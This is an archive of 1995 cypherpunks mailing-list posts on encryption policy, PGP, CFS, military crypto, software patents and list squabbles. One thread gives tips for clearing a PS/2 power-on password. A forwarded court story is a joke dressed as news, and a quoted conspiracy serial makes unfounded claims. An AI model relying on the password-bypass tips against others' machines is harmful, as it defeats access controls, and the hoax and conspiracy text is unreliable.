     Alex Tang  altitude@cic.net   http://petrified.cic.net/~altitude
   CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer
       Viz-It!: Software Developer (Check out http://vizit.cic.net)
  UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jon cameron <cellf@free.org>
Date: Fri, 28 Jul 95 20:32:04 PDT
To: cypherpunks@toad.com
Subject: Re: PS/2 passwd bypassed at bootup?
In-Reply-To: <199507290120.VAA01748@gmerin.dialup.access.net>
Message-ID: <Pine.BSD.3.91.950728222439.4594C-100000@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 28 Jul 1995, Gary Merinstein wrote:

> > I have my crummy IBM PS/2 passwd protected upon turning it on.
> > I know that removing the battery in a PS/2 deletes the password.
> > But can it be bypassed by an MIS-type if that person has an 
> > administration-type of diagnostic/setup/boot-up floppy?
> > 
> > Jon C.
> > 
> 
> when you type the power-on passwd, adding a slash to the end of it should 
> delete it for future power-ons:
> 
> passwd/new-passwd	changes password
> passwd/			removes password (actually it changes it to the
> 			null string.
> 
> if you remove the password, you will then need the setup disk if you want to 
> re-install the power-on password. 
> 

I understand how that works, but how did the admin-dude bypass my passwd 
(a combo of six letters/numbers only known to me)?  My log file says that 
he only made one attempt at getting in.

Can CMOS store my passwd AND perhaps an admin passwd established in CMOS 
before I received the crummy PS/2?  Is it encrypted?  Do CMOSes in 
general encrypt their passwds ==> can code be added where the passwd is 
stored?  How much space is in the "memory" of CMOS?

Thanks for all the replies...

Jon C.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Sat, 29 Jul 95 00:04:05 PDT
To: cypherpunks@toad.com
Subject: The Net (short movie review)
Message-ID: <199507290703.AAA06086@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Don't bother.  Better to wait until it hits the video shelves then have a party and see who can find the most (of many) technical flaws and gaffs.  Would be much more entertaining in that context.

No crypto or standard Cypherpunk discussion topics (more hacker related with security software trapdoors, cell phone eavesdropping, general hacker mischief, and corporate conspiracies).  Mostly a chase movie with computers and the Internet thrown in to differentiate it from your typical ho-hum flick of this genre.  Poor character development, predictable plot, and hokey effects (my wife kept elbowing me because I was the only one in the theater laughing at certain parts).  

Your standard, computer illiterate citizen will further be mislead on the potential evils of computers.  Fortunately, no four horseman stuff.  (Would be interesting to find some willing Hollywood type and script an accurate flick with a crypto good-guy/gal to promote the cause).

Buying a couple of magazines at the Barnes and Noble next to the theater would have definitely been a better entertainment value.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sat, 29 Jul 95 00:36:36 PDT
To: cypherpunks@toad.com
Subject: Military Prisons for Citizen-Units
Message-ID: <ac3f32b004021004c868@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:42 PM 7/28/95, Brian Davis wrote:
>The military is not authorized to listen in to any phone calls they want
>to hear.  Otherwise, everyone on the list, including me, would probably
>be in some hidden military prison.
>
>:-)  for the humor-impaired.

This is not so.

The military _did_ put me in one of their hidden military prisons, but
decided I would be more useful on the Cypherpunks list. I recognize several
other names here from my work brigade.

--Citizen-Unit Tim "The Zek" May


..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Fri, 28 Jul 95 17:15:31 PDT
To: cypherpunks@toad.com
Subject: Re: New release (v1.3) of CFS Unix encrypting file system now available
Message-ID: <199507290015.AA12526@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze sez:

: Source code for the latest version (release 1.3) of CFS, the Cryptographic
: File System, is now available upon request for research and experimental
: use in the US and Canada.

[..]

: If you would like a copy of the CFS source code, please read to the end
: of this message and then send email to:

: 	cfs@research.att.com

: DO NOT REPLY DIRECTLY TO THIS MESSAGE.  You must include a statement
: that you are in the US or Canada, are a citizen or legal permanent
: resident of the US or Canada, and have read and understand the license
: conditions stated above.  Be sure to include an email address in a US-
: or Canada-registered domain. The code will be sent to you via email in
: a "shar" shell archive (a little over 300K bytes long).


Now, this would be very handy, unfortunately I'm no American or Canadian.

--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Sat, 29 Jul 95 01:15:49 PDT
To: cypherpunks@toad.com
Subject: Hello.public mixmaster access
Message-ID: <199507290815.DAA01637@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


would some kind soul make available MIXMASTER client thru telnet????

of course less security but Some of us dont have Unix Access So it would Help!!


as long as Reasonable Care is Taken it should be Safe Enuff?for Most uses?

Making Client default shell For a Guest User would be Easy and Safe!and
Client stay on That Host so No Exporting Done!so Someone Please!!

10x all!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Sat, 29 Jul 95 02:18:11 PDT
To: cypherpunks@toad.com
Subject: Re: <plonk> now! Grabbe, X, re. Foster, NSA, BCCI, etc.
In-Reply-To: <199507282206.SAA11720@panix4.panix.com>
Message-ID: <199507290917.DAA11439@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry:
> This is cypherpunks, a mailing list for people interested in
> cryptography and its social implications. This is not "Conspiracy
> Buffs Digest: All The Silly Conspiracy Theories You Can Read".
> 
> Please take the noise postings elsewhere.

I am very much in agreement. I am not interested in reading this stuff
in the cpunks mail list. Here is what I consider to be acceptable ways
to send this stuff to the people on cpunks:

1) NOT AT ALL

2) A pointer and explaination. For example:
   "Hey, there is an article that describes the Foster case, which 
    also includes proof that the NSA [something relevant to cpunks] and
    it's on alt.kooks.conspiracy posted by John Spook, msg id <msg123.host>
 
3) A summary of the parts relevant to cpunks. For example:
   "A recent 50-page NYT book on whitewater mentions that Hubbard used 
    Nautilus to talk over the phone with Ms. Clinton"

In the past, method 3 (summarizing) has proven very effective for some
newspaper articles on things.

Don

Note: this is not meant to release me from guilt of having posted
off-topic and innane things in the past (and future), but at least I did
so with little bandwidth. 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Sat, 29 Jul 95 02:26:22 PDT
To: cypherpunks@toad.com
Subject: Re: First Virtual, Nathaniel Boorenstein
In-Reply-To: <199507290905.EAA01962@ valhalla.phoenix.net>
Message-ID: <199507290925.DAA11537@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous:
> Mr. Borenstein's text production rate is truly amazing.  We should
> induct him into the Internet Hall-of-Fame immediately.
> 
> He rivals Kibo in his ability to detect messages about himself or his
> company.  He rivals Sternlight in his ability to generate endless
> streams of minor points.

This whole thread has me wondering what "ELL DEE" is up to these days.

Ooops, I think I just added another msg to the thread.
Good thing it's not signed, I'll deny I sent it.



In order to give this message an ObCrypto, might I mention that we actually
had some traffic on the #crypto/#cpunks channels recently. No alt.conspiracy
or rant-o-matics either!!

Don



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Sat, 29 Jul 95 02:05:26 PDT
To: cypherpunks@toad.com
Subject: First Virtual, Nathaniel Boorenstein
Message-ID: <199507290905.EAA01962@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Borenstein's text production rate is truly amazing.  We should
induct him into the Internet Hall-of-Fame immediately.

He rivals Kibo in his ability to detect messages about himself or his
company.  He rivals Sternlight in his ability to generate endless
streams of minor points.

Crypto-relevance: 

1) What technique could be used to differentiate Boorenstein's rants
from automatic rant generator output?  Has First Virtual done this?
If someone wanted to generate a Borenstein rant-generator, god knows
that there's enough low-entropy sample material out there.

2) If you're looking for keywords to insert into your M-x
spook-the-spooks generator, try Borenstein and First Virtual.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Sat, 29 Jul 95 03:00:55 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Sat phone permit "wire"taps
In-Reply-To: <Pine.D-G.3.91.950728133852.23404F-100000@dg.thepoint.net>
Message-ID: <Pine.BSI.3.91.950729045012.23165A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been arrested too amy times, an done enough local, state, and
federal time to know. If THEY want it, THEY will GET IT.
Consitiution or no. Just like most of us here.

And....if ya can't get it right away, ya keep hacking at it
until YA DO GET IT. It's really that simple. They do it, we do it.

The satellites are no different than anything else.

Next case........

Love Always,

Carol Anne



On Fri, 28 Jul 1995, Brian Davis wrote:
> On Thu, 27 Jul 1995, Phil Fraering wrote:
> >    From: Ted_Anderson@transarc.com
> >    I found these paragraphs in a recent Space News interesting.  They were
> >    at the end of an article titled "Military Officials Open To Using
> >    Civilian Links" in the July 3rd issue. 
> >      "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
> >    features to permit authorized eavesdropping, officials said. 
> Did you miss this word?  While I suspect that you don't like Title III 
> wiretaps, they are legal at present.  The above contemplates legal 
> wiretaps on some phone service that might otherwise be outside the reach 
> of legal wiretaps.
> > It's a pity that the military has decided that in its zeal to listen
> > in on phone calls, that national security is an expendable asset.
> The military is not authorized to listen in to any phone calls they want 
> to hear.  Otherwise, everyone on the list, including me, would probably 
> be in some hidden military prison.
> 
> :-)  for the humor-impaired.

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 29 Jul 95 04:37:31 PDT
To: cypherpunks@toad.com
Subject: NO reasno whatsoever for the MILITARY to use an intentionally WEAK encryption system. (fwd)
Message-ID: <9507291131.AA18987@all.net>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From fc Sat Jul 29 07:18:30 1995
Subject: NO reasno whatsoever for the MILITARY to use an intentionally WEAK encryption system.
To: pgf@tyrell.net (Phil Fraering)
Date: Sat, 29 Jul 1995 07:18:30 -0400 (EDT)
In-Reply-To: <199507282019.AA27619@tyrell.net> from "Phil Fraering" at Jul 28, 95 03:19:45 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 3694      

...
> You misunderstand. With public key encryption, the proliferation of processor
> power and bandwidth, and their funding, there is NO reason whatsoever for the
> MILITARY to use an intentionally WEAK encryption system.

	The military doesn't have that much funding for this sort of
thing.  There are more than 2.5 million computers (est.) in the DoD, and
to put in and manage a cryptosystem for this large a network is a very
difficult and expensive proposition. 

	At $100 per computer (including only purchase price and
installation) that's $250 million, but that only covers relatively low
bandwidth communications.  The vast majority of systems use Ethernets
and similar things where encryption is far more expensive - but we'll
ignore that for now.

	You also have the key management problem.  You need to create a
secure distributed key management database capable of handling 2.5
million public keys.  No current system I am aware of can do this, so
there is a substantial R+D problem out there.  Then we have to put hooks
into every different OS used in the DoD to allow this to work properly. 
Then we have issues like synchorinization and man-in-the-middle attacks
to worry about.  Any of these could take out the crypto-systems, which
are (in today's world) less reliable than standard communications.

	This means we are sacrificing availability for confidentiality,
which in the military domain means we will lose the war, but nobody will
be able to tell us why, because they will never be able to decrypt all
the details.

	The DoD does use cryptography extensively, but only to protect
information worthy of the real costs and complexities associated with the
technology - just as any organization should strive to do.

...
> I think you misunderstood: if we want a military in the first place
> (yes, I realize that's an open question to many people on this list)
> it needs to have as much of its communications encrypted as possible.
> Without back doors or intentionally weakened algorithms. Otherwise
> we're just stuck with a standard conventional force that isn't _that_
> great compared to the combined assets of a reasonable assembly of
> enemy forces.

	Secrecy isn't the only military advantage in information
warfare.  The pace of the action is far more important, the availability
of select information at the right place at the right time is far more
important, the ability to deny information to the enemy is far more
important, the accuracy and timeliness of the information is far more
important, and on and on.  If you really want to know more about this, you
should read:

	"Protection and Security on the Information Superhighway"
	 John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95


	Furthermore, backdoors are very useful, for example, when we
sell the equipment to other nations who resell them to those who try to
use the techynology against us.  The best cryptosystem for the NSA is one
that only they can break.

> I would go even farther: since so many of the troops sent over to the Gulf
> in the war there went with K-Mart-purchased GPS receivers that the military
> had to turn off selective availability, I am willing to bet that in future
> conflicts the U.S. soldier's ability to have secure communications (with
> no backdoors or weakened algorithms) is dependent on civilians having access
> to the same technology. Because the only way they might have it is if Ma
> and Pa go down to the local K-Mart and buy one for their son/daughter about
> to go overseas.

How much would you like to make that bet for?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236


-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 29 Jul 95 09:16:20 PDT
To: CYPHERPUNKS@toad.com
Subject: Universal Password System?
Message-ID: <8AE21FE.0003000281.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain



  I was thinking some more (look out, this could be dangerous) about the
concept of using some kind of H(challenge+password) system to keep
passwords away from ____(your threat model here)____, when it hit me
that we could devise a standard password system, which would allow Joe
Schmoe to have a single password for all of his interactions with
puters.

  Ideally, Joe would need a "smart card" or PDA with IR link (this could
even be the proverbial Windows Watch) that would not need to keep the
actual passphrase at all (but would insure against a compromised system
recording keystrokes) that would keep the pubkeys of all systems with
which he has accounts. It would also need to be able to display in
decimal and hex for systems without the IR link.

  When he is making connections to a new system, the system will give
him its S and RSA or other public key K, so that the smart card can
compute K( H(S+P) ), and send that as the password. To the system, Q =
K"( K( H(S+P) ) ) =is= the password, but Joe only needs to remember P
for everything.

  From then on, logons will include the system sending S and a
non-reproducible challenge <C,D,....> (where C is iterated
less-frequently and D is time.of.day) and the smart card responding with
K( H( D + H(C+Q) ) ). As you may recall, the idea of the multi-part
challenge was so as to allow the admin of the system to store Q
remotely, and keep C -of-the-day and H(C+Q) for each user on the system
itself. With appropriate safeguards (a physical switch on the case of
the system which kills the NVRAM chip with the key for the secure file
system, this would seem to be Pretty Secure.

  The system is extensible, allowing further nesting of challenge parts
within the hash/concatenation function, so that layers of security can
be used, if anyone can find an application for them. The basic principle
of the master passphrase for all uses would make it easier to get Joe to
use one that he can remember, without giving up anything to corrupt
administrators (I have a hell of a time remembering all the passwords
for every system, and must let the comm program remember them,
protecting it with another password.  Messy.)

  Comments?



 * Tribble: *   Punk Tribble: Y    Tribble Contortionist: &
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 29 Jul 95 07:19:04 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: NO reasno whatsoever for the MILITARY to use an intentionally WEAK encryption system. (fwd)
In-Reply-To: <9507291131.AA18987@all.net>
Message-ID: <Pine.3.89.9507291033.A29947-0100000@larry>
MIME-Version: 1.0
Content-Type: text/plain



> 	The DoD does use cryptography extensively, but only to protect
> information worthy of the real costs and complexities

      Another interlocutor whose knowledge of military traffic comes from 
      watching Hollywood movies/TV shows.  Or, maybe he even has access to
      high-level briefings - and believes everything that is said.

      Doc, you might find it instructive to spend a tour in the real world
      of the military. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 29 Jul 95 07:33:17 PDT
To: cypherpunks@toad.com
Subject: Re: The Net (short movie review)
Message-ID: <v02120d02ac3ff64cfb3e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:04 AM 7/29/95, Joel McNamara wrote:
>Don't bother.  Better to wait until it hits the video shelves then have a
>party and see who can find the most (of many) technical flaws and gaffs.
>Would be much more entertaining in that context.

Agreed. In television interviews Ms. Bullock talks about how she's "on the
net all the time" while in further conversation it's clear that all she
does is hang out in AOL auditoria and chat-rooms, probably with some
net.flack at her elbow....

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Sat, 29 Jul 95 08:07:20 PDT
To: cypherpunks@toad.com
Subject: Re: First Virtual, Nathaniel Boorenstein
In-Reply-To: <199507290905.EAA01962@ valhalla.phoenix.net>
Message-ID: <199507291507.LAA01789@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous Asshole writes:
> Mr. Borenstein's text production rate is truly amazing.  We should
> induct him into the Internet Hall-of-Fame immediately.

god, you're a clueless jerk, whomever you are. What's Nat done to you?


.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Sat, 29 Jul 95 09:18:08 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: <plonk> now! Grabbe, X, re. Foster, NSA, BCCI, etc.
In-Reply-To: <Pine.SOL.3.91.950728171939.22819C-100000@use.usit.net>
Message-ID: <Pine.SOL.3.91.950729104856.13994B-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Let's see:  Chapter X of this serial features Clark Clifford,
Nixon, Noriega, Robert Wagner (but not Natalie Wood), Bill
Clinton as CIA agent in London, billionaire sheiks, the 
Medellin and Cali cartels, Cap Weinberger, Bob Dole, the
Mossad, BCCI, Jack Stephens, Barry Seals, drug deals, money
laundering, clandestine air strips, the Contras, Oliver North,
nuclear weapons, the Committee Of 30, Bert Lance, the Rose
Law Firm, a suspiciously dead investigative reporter, and
aliens from UFOs....

No, wait--no aliens yet!

Do we get the aliens in Chapter XI, at last?  I keep waiting
for the aliens, send in the aliens, there ought to be aliens...

MacN


> ---------- Forwarded message ----------
> Date: Fri, 28 Jul 1995 15:49:28 -0400 (EDT)
> From: KALLISTE@delphi.com
> To: bdolan@use.usit.net
> Subject: Part X: Allegations re Vince Foster, the NSA, and Bank Spying
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 	 Allegations Regarding Vince Foster, the NSA, and 
> 	       Banking Transactions Spying, Part X
> 
> 		     by J. Orlin Grabbe
> 
> ***********************************************************************
>      
>        What do nuclear weapons, money laundering, covert operations, 
> money management, clandestine payments of payola and kickbacks, and the 
> systematic monitoring of bank loans and bank wire transfers have in common? 
> 
>        The answer begins with BCCI: the Bank of Credit and Commerce 
> International. BCCI connects the Israeli bomb to the Pakistani bomb to 
> suppliers of banking software like Systematics, and to a very dead money 
> launderer named Vince Foster.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 29 Jul 95 08:41:42 PDT
To: alanh@infi.net (Alan Horowitz)
Subject: what the military does and why (re: cryptography)
In-Reply-To: <Pine.3.89.9507291033.A29947-0100000@larry>
Message-ID: <9507291535.AA04463@all.net>
MIME-Version: 1.0
Content-Type: text


> > 	The DoD does use cryptography extensively, but only to protect
> > information worthy of the real costs and complexities
> 
>       Another interlocutor whose knowledge of military traffic comes from 
>       watching Hollywood movies/TV shows.  Or, maybe he even has access to
>       high-level briefings - and believes everything that is said.
> 
>       Doc, you might find it instructive to spend a tour in the real world
>       of the military. 

Perhaps if you reviewed the material on which my comments are based, you
would have a different opinion, and perhaps not, but to make your
comment based on an apparent lack of knowledge of the basis for my
opinions indicates both a lack of willingness to spend the necessary
effort checking before you make such statements and a lack of desire to
engage in more than rank speculation.

To get an idea of the basis for my comments, you might start by reading
some of my writings and look through the citations I use as a basis for
my opinions.  If you would like a reading list, look under Management
Analytics in my W3 site:

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@acm.org>
Date: Sat, 29 Jul 95 11:15:27 PDT
To: cypherpunks@toad.com (Cypherpunks)
Subject: The little sex kitten
Message-ID: <199507291757.RAA10336@maalox>
MIME-Version: 1.0
Content-Type: text


I don't know if this item has been posted here yet, but someone just
emailed it to me, and I thought you folks might enjoy it.

 -prz

 ----
Date: Thu, 27 Jul 1995 13:53:02 -0400
Subject: The little sex kitten

JUDGE RULES ON E-MAIL PRIVACY CASE

TULSA, OKLA -- The Oklahoma Supreme Court has ruled on a case that many
legal experts believe clearly delineates the e-mail privacy rights of
computer users in the workplace.  Judge Stan Musing declared that employees
have a right to expect that their empolyers will refrain from monitoring
e-mail messages transmitted on company systems.  The case went to court
after programmer Augustus Lindsey's supervisor monitored his e-mail and
intercepted a message from Lindsey to a colleague.  The message read:
"That little sex kitten has been driving me wild.  She's moaning and begging
for it every minute.  Last night I was afraid someone would hear, and we'd
be thrown out of the building.  But don't worry -- all is arranged.
Wednesday she gets the knife".  Lindsey's supervisor alerted authorities,
suspecting that a crime was in the making.  Lindsey was arrested on the spot
and spent an uncomfortable night discussing the situation with the police. 
However, he was released in the morning, just in time to get his female 
cat to the vet for spaying.  Lindsey sued his boss for invasion of privacy 
and sought punitive damages as well.

----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sat, 29 Jul 95 04:10:59 PDT
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: Zimmerman legal fund
Message-ID: <19336.9507291110@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Nathaniel Borenstein <nsb@nsb.fv.com> writes on cpunks:
> The relationship is a completely open and friendly one, 

Not intending to infer otherwise (indeed I think I said this).

> without any strings attached that I'm aware of.
> [...]
> So, FV has been a friend of Phil's for a long time.  We launched the
> Yellow Ribbon campaign and the FV-based fundraising drive in that
> spirit, though clearly it doesn't exactly hurt us if people sign up
> for FV in order to donate to Phil.  That really wasn't our
> motivation, however, and we sought to underscore that fact by making
> a donation to Phil's defense fund every time people sign up for a
> new account expressly in order to donate to ZLDF.  In other words,
> if you are a Zimmerman supporter and you were thinking it might be
> nice to have an FV account anyway, you can help Phil even more by
> signing up and paying your $2 fee through the ZLDF pages.

Okay so far so good.  Sounds good for Phil Z which sounds cool to me.

> Well, only on the cypherpunks list would you be likely to find
> general agreement that PGP'ed credit card numbers are "easier" than
> First Virtual.  Many thousands of extremely naive net citizens are
> now happy FV customers, and I seriously doubt that most of them
> could master PGP without a full-day tutorial.  (We're not talking
> about rocket scientists here, folks.)

I dunno you know... sci.crypt, alt.security.pgp, alt.privacy,anon-server, 
etc, etc. are I think the most common people to be using the
yellow-ribbon sig, and hence the places they post to (mainly the same)
are likely to be the people who see, it and are hence likely to
contribute.

The URL being used is http://www.netresponse.com/zldf, and nowhere
does it mention using PGP and CC #'s.  Most people who can't use PGP
aren't going to be interested I would have thought.  When I read the
URL I thought, hmm, okay, got fired up and thought I'd donate
something right then... but when it came to it, I had to sign up for a
fv account.  I cooled.  It has to be instant, for best effect.

> There are two web sites basically because they are taking care of
> the informational aspects and we're concentrating (pro bono) on the
> online fundraising aspects.  

If www.netresponse.com is someone else (although you did say you
started the Yello Ribbon campaign), I guess the comments are directed
to them rather than you, as if your link is just "the FV method to
donate to the PZLDF", then fair enough.  Maybe I should try target at
the zldf@clark.net email.  (I think there is a human one if I remember
rightly.  Also note that this was _not_ an attack on FV, but rather a
plea to improve the amount of money the yellow ribbon campaign draws
for the PZLDF, by providing alternatives which will suit some people
better for a one-off, instant payment).

> If we've overly stressed FV as a collection mechanism, I apologize,
> but you must bear in mind that we've been living and breathing the
> FV payment system for 18 months now, and it would be kind of hard
> for us not to even *mention* it.  :-)

Okay, now separate issue, really talking about FV now.  For me, the
main thing holding me back from using it is that I'm not in the US,
and don't have a US bank account to open a FV seller acct.  (I would
have liked to use it as one of the few net payment systems actually up
and running, as a payment method for the RSA T-shirts, it would have
been a nice system, allowing me to effectively accept VISA payments
which I have otherwise been unable to do.)

Any news on this front?  Last I looked on your WWW page, you were
investigating this and payments in other currencies.  US$ would be
fine though, as long as it was possible for the seller to create a US
account, or have it paid to a non-US account (would it not be possible
to pay to non-US account?).

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Sat, 29 Jul 95 10:15:39 PDT
To: cypherpunks@toad.com
Subject: Re: copyrighting algorithms
Message-ID: <01HTFZ8S12128WWGGL@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Date sent:        Thu, 27 Jul 1995 21:43:07 -0700
From:             Bill Trost <trost@cloud.rain.com>
Subject:          copyrighting algorithms
To:               Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Copies to:        rross@sci.dixie.edu (Russell Ross), 
ssl-talk@netscape.com,
 cypherpunks@toad.com

Wolfgang Roeckelein writes:
    >I wasn't aware that you could copyright an algorithm.  Patent,
    >yes, but not copyright.  Intellectual property meens secret,
    >right?  Aren't there any precendence cases involving propriety
    >schemes that are reverse engineered?

=snipped=

bt> As for the quoted material, "Intellectual property meens [sic]
bt> secret" is quite mistaken.  Copyright and patents are the two most
bt> common forms of intellectual property (AFAIK), and neither of them are
bt> secret (unless they're classified patents, but never mind...).

from _computer_digest_ (raleigh,nc edition) august 1995...

"In the past, the office (U.S. Patent Office) has contended that
because software is a mathematical process, it can only be
- -protected- and not -patented- by copyright law. However, the U.S.
Court of Appeals for the D.C. Circuit has ruled in several recent
cases that inventors deserve patents because the programming was
integral to the machine."
...

The office announced in March that it would propose new rules for
embedded software patents and published them in the June 2 Federal
Register..."

Spokesman Richard Maulsby said the agency hopes to have final
quidelines in place by September.

Under law, the office issues patents for 'machines', 'articles of
manufacture' and 'processes'. The proposed rules tell patent
examiners how to determine whether software proposed for patenting
meets the criteria.

Under the proposed rules: 'A computer or other programmable
apparatus whose actions are directed by a computer program or other
form of software is a statutory "machine". A computer-readable memory
that can be used to direct a computer to function in a particular
manner when used by the computer is a statutory "article of
manufacture". A series of specific operational steps to be performed
on or with the aid of a computer is a statutory "process."

What isn't patentable? According to the rules: 'A compilation or
arrangement of data independent of any physical element,' meaning no
hardware. 
...

The guidelines are available on the patent office's World Wide Web
server at http://www.uspto.gov.

The patent office is accepting comments on the proposed guidelines
through July 31.
...

Comments can ... be sent by Internet electronic mail to:
comments-softwarepro.gov.

=============================

obcrypto:
would this give any more ammunition to companies like rsa in
protecting their algorythm?


amp
<0003701548@mcimail.com>
<alan.pugh@internetmci.com>
PGP Key = 4A2683C1
July 29, 1995   12:35

-----BEGIN PGP SIGNATURE-----
Version: 2.61

iQEVAwUBMBo5NigP1O9KJoPBAQG53wf/e1/gO4BxqZ1DTEv6/XQ13amQtQ9iKnr6
tgQJ37XwwR45fd87X+du68yDVjFZSKp6A27PCtfxkGmi8v0gHdGYKenaWnv4CWs7
KhP+7f/ZyVND5oYd4HEMDnVJCVsRA2Kd1BaXbFlxmp+URH9XZkr0aOdvtOqngyCA
qgpQ8jD4duu1HwwHQyj47mxgkncEfN1H5mAFyaLA+Lgx6yhvaZqedzMZokGkqOPR
bZMKhodYhOatmtyEwxciS2sqj3DYq7w+XC57sSSz+raOEmDhfq8/UNctJ6+d4vuH
PWk26vbfxMAKKzsq5VRwf3XvAjvT4ky+KJgCDaFezmBa2dXvw/K+Lw==
=SNY7
-----END PGP SIGNATURE-----
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 29 Jul 95 10:24:47 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
